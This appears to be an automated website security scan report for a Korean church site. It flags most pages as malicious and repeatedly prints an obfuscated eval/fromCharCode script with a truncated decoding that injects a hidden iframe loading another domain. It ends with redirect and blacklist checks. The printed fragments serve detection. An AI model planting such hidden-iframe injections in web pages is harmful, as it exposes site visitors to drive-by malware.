Scanned pages/files
Request | Server response | Status |
http://www.afbckorea.org/ | 200 OK Content-Length: 13293 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3 Decoded script: function getMonthNum(abbMonth) { var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" ); var i; for (i = 0; i < arrMon.length; i++) { if (abbMonth == arrMon[i]) { return i; } } return -1;}function dateUTCdateToDate(dateString) { var arrDateStr = dateString.split(" "); var month = getMonthNum(arrDateStr[2]); var day = arrDateStr[1 s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } } /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://www.afbckorea.org/index.html | 200 OK Content-Length: 13293 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3 Decoded script: function getMonthNum(abbMonth) { var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" ); var i; for (i = 0; i < arrMon.length; i++) { if (abbMonth == arrMon[i]) { return i; } } return -1;}function dateUTCdateToDate(dateString) { var arrDateStr = dateString.split(" "); var month = getMonthNum(arrDateStr[2]); var day = arrDateStr[1 s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } } /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://www.afbckorea.org/servicetimes.htm | 200 OK Content-Length: 9508 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3 Decoded script: function getMonthNum(abbMonth) { var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" ); var i; for (i = 0; i < arrMon.length; i++) { if (abbMonth == arrMon[i]) { return i; } } return -1;}function dateUTCdateToDate(dateString) { var arrDateStr = dateString.split(" "); var month = getMonthNum(arrDateStr[2]); var day = arrDateStr[1 s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } } /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://www.afbckorea.org/directions.htm | 200 OK Content-Length: 8258 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3 Decoded script: function getMonthNum(abbMonth) { var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" ); var i; for (i = 0; i < arrMon.length; i++) { if (abbMonth == arrMon[i]) { return i; } } return -1;}function dateUTCdateToDate(dateString) { var arrDateStr = dateString.split(" "); var month = getMonthNum(arrDateStr[2]); var day = arrDateStr[1 s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } } /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://www.afbckorea.org/ourpastor.htm | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://www.afbckorea.org/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://www.afbckorea.org//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://www.afbckorea.org/statementoffaith.htm | 200 OK Content-Length: 24558 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3 Decoded script: function getMonthNum(abbMonth) { var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" ); var i; for (i = 0; i < arrMon.length; i++) { if (abbMonth == arrMon[i]) { return i; } } return -1;}function dateUTCdateToDate(dateString) { var arrDateStr = dateString.split(" "); var month = getMonthNum(arrDateStr[2]); var day = arrDateStr[1 s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } } /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://www.afbckorea.org/ourmissionaries.htm | 200 OK Content-Length: 42015 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3 Decoded script: function getMonthNum(abbMonth) { var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" ); var i; for (i = 0; i < arrMon.length; i++) { if (abbMonth == arrMon[i]) { return i; } } return -1;}function dateUTCdateToDate(dateString) { var arrDateStr = dateString.split(" "); var month = getMonthNum(arrDateStr[2]); var day = arrDateStr[1 s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } } /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */ Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: afbckorea.org
Result:
GET / HTTP/1.1
Host: afbckorea.org
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: afbckorea.org
Referer: http://www.google.com/search?q=afbckorea.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: afbckorea.org
Referer: http://www.google.com/search?q=afbckorea.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=afbckorea.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://afbckorea.org/
Result: afbckorea.org is not infected or malware details are not published yet.
Result: afbckorea.org is not infected or malware details are not published yet.